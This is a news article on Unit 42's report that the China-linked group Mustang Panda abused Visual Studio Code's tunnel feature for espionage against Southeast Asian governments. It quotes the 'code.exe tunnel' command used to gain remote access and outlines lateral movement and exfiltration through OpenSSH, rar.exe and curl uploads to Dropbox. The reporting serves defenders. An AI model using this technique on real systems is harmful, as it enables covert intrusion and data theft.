The China-linked advanced persistent threat (APT) group known as Mustang Panda has been observed leveraging Microsoft’s Visual Studio Code (VSCode) software as a weapon in its arsenal of cyber espionage tools. This news comes from a recent report by Palo Alto Networks’ Unit 42, shedding light on a series of attacks targeting government entities across Southeast Asia.
Novel Exploitation of VSCode’s Reverse Shell Feature
The campaign, believed to be an extension of activities first detected in late 2023, showcases a relatively new technique in cyber warfare. Mustang Panda, known by aliases such as BASIN, Bronze President, and Earth Preta, has weaponized VSCode’s embedded reverse shell feature to establish a foothold in targeted networks.
Tom Fakterman, a researcher at Unit 42, explained the attack vector: “To abuse Visual Studio Code for malicious purposes, an attacker can use the portable version of code.exe, or an already installed version of the software. By running the command code.exe tunnel, an attacker receives a link that requires them to log into GitHub with their own account.”
This process grants the attacker access to a web-based VSCode environment connected directly to the compromised machine, allowing for remote code execution and file manipulation.
Sophisticated Tactics for Persistence and Data Exfiltration
The APT group’s methodology doesn’t stop at initial access. Mustang Panda operatives used the VSCode exploit to deliver additional malware, conduct network reconnaissance, and exfiltrate sensitive data. The attackers also leveraged OpenSSH for lateral movement within compromised networks, executing commands, and transferring files across multiple systems.
In a notable tactic, the group employed legitimate tools like the file archiver rar.exe over SMB to package and steal data from various network drives. To further obfuscate their activities, they used curl to upload exfiltrated information to Dropbox, blending malicious traffic with legitimate cloud storage operations.
Potential Collaboration or Overlap with Other Chinese APTs
During their investigation, Unit 42 researchers uncovered a second cluster of malicious activity occurring simultaneously within the same infected environments. This separate intrusion set utilized ShadowPad, a modular backdoor commonly associated with Chinese espionage groups.
“Based on the forensic evidence and timeline, one could conclude that these two clusters originated from the same threat actor,” Fakterman noted. However, he also suggested alternative explanations, including the possibility of collaboration between multiple Chinese APT groups.
Implications for Cybersecurity and Government Entities
The discovery of VSCode exploitation in the wild marks a significant evolution in APT tactics. Cybersecurity experts recommend that organizations closely monitor for unusual VSCode activity and scrutinize persistence mechanisms such as scheduled tasks that could indicate a compromise.
The ability of Mustang Panda to abuse legitimate development tools highlights the importance of comprehensive security measures that go beyond traditional malware detection.
